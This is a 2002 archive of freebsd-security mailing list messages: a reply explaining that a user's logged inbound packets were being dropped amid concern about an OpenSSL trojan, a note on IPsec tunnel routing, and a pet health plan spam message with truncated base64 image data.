gw.nectar.cc (gw.nectar.cc [208.42.49.153]) by mx1.FreeBSD.org (Postfix) with ESMTP id 90C9E43E3B for ; Fri, 2 Aug 2002 11:30:34 -0700 (PDT) (envelope-from nectar@nectar.cc) Received: from madman.nectar.cc (madman.nectar.cc [10.0.1.111]) by gw.nectar.cc (Postfix) with ESMTP id 0BACB10; Fri, 2 Aug 2002 13:30:34 -0500 (CDT) Received: from madman.nectar.cc (localhost [IPv6:::1]) by madman.nectar.cc (8.12.3/8.12.3) with ESMTP id g72IUXU4018816; Fri, 2 Aug 2002 13:30:33 -0500 (CDT) (envelope-from nectar@madman.nectar.cc) Received: (from nectar@localhost) by madman.nectar.cc (8.12.3/8.12.3/Submit) id g72IUX5N018815; Fri, 2 Aug 2002 13:30:33 -0500 (CDT) Date: Fri, 2 Aug 2002 13:30:33 -0500 From: "Jacques A. Vidrine" To: D J Hawkey Jr Cc: security at FreeBSD Subject: Re: OpenSSL trojan: I seem to have post-install evidence? Message-ID: <20020802183033.GA18787@madman.nectar.cc> Mail-Followup-To: "Jacques A. Vidrine" , D J Hawkey Jr , security at FreeBSD References: <20020802122851.A55094@sheol.localdomain> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802122851.A55094@sheol.localdomain> X-Url: http://www.nectar.cc/ User-Agent: Mutt/1.5.1i-ja.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 12:28:51PM -0500, D J Hawkey Jr wrote: > Aug 2 12:19:04 sheol ipmon[70]: 12:19:03.572959 dc1 @1:13 b 217.162.144.117,33247 -> 208.42.101.193,33484 PR udp len 20 40 IN > Aug 2 12:19:10 sheol ipmon[70]: 12:19:10.310476 dc1 @1:13 b 217.162.144.117,1041 -> 208.42.101.193,6667 PR tcp len 20 60 -S IN As in your previous message, these are packets that are coming INTO your system and are being dropped. High UDP ports like 33484 are indicative of traceroute. > But unlike the first, this address resolves: > > [sheol] ~$ nslookup 217.162.144.177 > Server: sheol.localdomain > Address: 192.168.16.2 > > Name: dclient217-162-144-177.hispeed.ch > Address: 217.162.144.177 > > And also unlike the first, the host tried some UDP first. > > Are we certain no exploits are in the wild, as of now? You can never be certain. There are none known though. > I won't post further on this unless it generates some interest. Yes, please don't. Cheers, -- Jacques A. Vidrine http://www.nectar.cc/ NTT/Verio SME . FreeBSD UNIX . Heimdal Kerberos jvidrine@verio.net . nectar@FreeBSD.org . nectar@kth.se To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 11:33:30 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 489C337B401 for ; Fri, 2 Aug 2002 11:33:27 -0700 (PDT) Received: from carbon.berkeley.netdot.net (carbon.berkeley.netdot.net [216.27.190.205]) by mx1.FreeBSD.org (Postfix) with ESMTP id A71D743E84 for ; Fri, 2 Aug 2002 11:33:26 -0700 (PDT) (envelope-from nick@netdot.net) Received: by carbon.berkeley.netdot.net (Postfix, from userid 101) id 4C410F84B; Fri, 2 Aug 2002 11:33:26 -0700 (PDT) Date: Fri, 2 Aug 2002 11:33:26 -0700 From: Nicholas Esborn To: Mailing List FreeBSD Security Subject: Re: esp tunnel without gif(4) [Was Re: vpn1/fw1 NG to ipsec/racoon troubles, help please ...] Message-ID: <20020802183326.GA52336@carbon.berkeley.netdot.net> References: <20020730074813.GF89241@blossom.cjclark.org> <86znw5r9h3.fsf_-_@notbsdems.nantes.kisoft-services.com> <86k7n9qv08.fsf@notbsdems.nantes.kisoft-services.com> <20020802172729.GA6880@blossom.cjclark.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020802172729.GA6880@blossom.cjclark.org> User-Agent: Mutt/1.5.1i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Fri, Aug 02, 2002 at 10:27:29AM -0700, Crist J. Clark wrote: > On Fri, Aug 02, 2002 at 02:56:39PM +0200, Eric Masson wrote: > > With only one tunnel configured, netstat -rn on the security gateway > > doesn't show any routes to the remote networks nor host. > > > > With a second tunnel added, are there any additionnal configuration > > steps or will the kernel do the routing automagically ? > > It's pretty much automagically done by way of the SPD entry. Any > packet that matches the source and destination in the SPD gets put > through the appropriate tunnel with the specified end points. It's not > the same as the regular routing table and will not show up in 'netstat > -rn.' I ended up using AH and ESP in transport mode between gateways, then using gif tunnels to encapsulate traffic to other networks. I wanted to be able to use the routing table. I never liked tunnel mode IPsec's "magic portal" approach. > -- > Crist J. Clark | cjclark@alum.mit.edu > | cjclark@jhu.edu > http://people.freebsd.org/~cjc/ | cjc@freebsd.org -nick -- Nicholas Esborn Unix Systems Administrator Berkeley, California To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 2 12:50:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id F200837B400; Fri, 2 Aug 2002 12:39:52 -0700 (PDT) Received: from host23.websitesource.com (host23.websitesource.com [209.239.41.222]) by mx1.FreeBSD.org (Postfix) with ESMTP id CB09A43E5E; Fri, 2 Aug 2002 12:39:45 -0700 (PDT) (envelope-from app-request@americanpetplan.com) Received: (from app-1@localhost) by host23.websitesource.com (8.10.2/8.10.2) id g72JCgF04622; Fri, 2 Aug 2002 15:12:42 -0400 X-Authentication-Warning: host23.websitesource.com: app-1 set sender to app-request@americanpetplan.com using -f Message-ID: <000501c23a57$ee694f80$c5031942@WEBSITES> From: "www.americanpetplan.com" To: Subject: Pet Health Plan! Date: Fri, 2 Aug 2002 14:08:00 -0500 MIME-Version: 1.0 Content-Type: multipart/related; type="multipart/alternative"; boundary="----=_NextPart_000_0001_01C23A2E.0244DFD0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Mailing-List: archive/latest/5 X-Loop: app@americanpetplan.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0001_01C23A2E.0244DFD0 Content-Type: multipart/alternative; boundary="----=_NextPart_001_0002_01C23A2E.0244DFD0" ------=_NextPart_001_0002_01C23A2E.0244DFD0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Email This offer is brought to you by the American Pet Plan.com. If you = no longer wish to receive offers in the future, please unsubscribe = below. If you cannot view this email, please click here: = www.americanpetplan.com =20 =20 1992 Celebrating 10 years of Excellence! 2002 =20 =20 The American Pet Plan can save you hundreds or even thousands of = dollars per year on all your veterinary health care costs! All at very affordable rates!! =20 =20 Veterinarian Recommended! Benefits Include:=20 $5.00 Doctor Visits!=20 $10.00 Comprehensive Medical Exams!=20 Lowest Cost In-Office Vaccinations!=20 Benefits on All other Veterinary Care & Rx's!=20 Benefits on Grooming & Boarding!=20 Benefits on Pet Sitting & Dog Training!=20 Immediate Benefits on Pre-existing Conditions!=20 All Animals Accepted!=20 No Age Limits!=20 Extremely Affordable!=20 And So Much More!=20 VISIT US NOW AT WWW.AMERICANPETPLAN.COM ! =20 -------------------------------------------------------------------------= - =20 This message is never sent unsolicited. You are receiving this = message as a member of the American Pet Plan.com or one of our = advertising affiliates. If you do not want to receive special offers in = the future, please click here: app-request@americanpetplan.com and type = in UNSUBSCRIBE in the subject line. You will be immediately removed. =20 ------=_NextPart_001_0002_01C23A2E.0244DFD0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Email
 
This offer = is brought to=20 you by the American Pet Plan.com.  If you no longer wish to = receive=20 offers in the future, please unsubscribe below.  If you = cannot view=20 this email, please click here: www.americanpetplan.com=20

1992   Celebrating 10 years of = Excellence!  =20 2002
 

The American = Pet Plan can=20 save you hundreds or even thousands of dollars per = year on all=20 your veterinary health care costs!
All at very affordable rates!! =20

Veterinarian=20 Recommended!

Benefits=20 Include:=20

$5.00 Doctor = Visits!
$10.00 Comprehensive Medical = Exams!
Lowest Cost In-Office=20 Vaccinations!
Benefits on All other Veterinary Care &=20 Rx's!
Benefits on Grooming &=20 Boarding!
Benefits on Pet Sitting & Dog = Training!
Immediate Benefits on Pre-existing=20 Conditions!
All Animals Accepted!
No Age Limits!
Extremely Affordable!
And So Much=20 More!

VISIT US = NOW=20 AT WWW.AMERICANPETPLAN.COM=20 !

This message is never sent = unsolicited. =20 You are receiving this message as a member of the American Pet = Plan.com or=20 one of our advertising affiliates.  If you do not want to = receive=20 special offers in the future, please click here: app= -request@americanpetplan.com=20 and type in UNSUBSCRIBE in the subject line.  You will be = immediately=20 = removed.

------=_NextPart_001_0002_01C23A2E.0244DFD0-- ------=_NextPart_000_0001_01C23A2E.0244DFD0 Content-Type: image/jpeg; name="index_header.jpg" Content-Transfer-Encoding: base64 Content-Location: http://www.americanpetplan.com/images/index_header.jpg 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 E8PWhOtvpxw3nNeUUx1raxPFGIWq8g4mTmDkrG2pMglXmPEWrl9K1/HTyw2qda5I/gr0NW1TetNJ WUp93OQjt96Tpt5i5dxWP5dwOaxxvrJkLmXoW4rliCwrPjbLQJPB0alUwLKELNC5sFNVUTNtLvy6 xHos51/WGrD7R8r/AHi9TUfd5HXaI++p0H+EHaNWGg4yQxfPt7mbmcJZgx/LmDxMQieatUyGYuDb RitXJ2FqKuJEgmtWtotSapHXRwJOtDSxPK9fl70hXaqS5iKhZ5cqY/IGdYbCUMs1+zNFF1KTxQXU mxccM9zw0hmrmSGGOsks3V9ErMvO9IqxUjE80kEEjQrytmGU6jv6rAMNO4IBHccYTmOpPa5C5bQ2 Lt6l6Q62TmyNgaRwR28rjoYqNEu7WGiUVjYkeRYAZbMiCJhGkrQcqUOaOcsnHckyO61ztBirLxGG pUrVchOUNjzK3HNBPkpJC3hMYqixOIZHRZwWEeP5SwPlPMGSyT5aV8LzVj8JHFTtVKy2qluSaNt/ Wx9ow2B0t4nDPEo1Xwrkg8c44OHl3mrN4GpJLNBjshJVgknZDKyeqU6jIkaFgG0LBEB012r7OMty bhqXMP2Mhu3lz/neCw0NycQtirZvt4XJWgixRzVoa1ySI1A00xlrB+o3U023+T8SkGQuUZb/AIbF 83QcuzLZmrmW3TmWMLajZKqLXs9TqkoY54kR4h6zRM02e5I5UxC86GFs9Z+x+fwtFy9+jH4+nlEv yPXH+yP1a1CKJj8bsni6ku9aLpDpPz1gKnLPM+RxFGSeSnAYmrm06SWBHLEr7ZZI4oUdgSe6xJ20 GhI3H9BrMSl13aPGNSGBUFfZvUnsUHfU8ZHPVpgac0brXO4mQFXBI90j1W01PYdvaRxaix8Djw1i 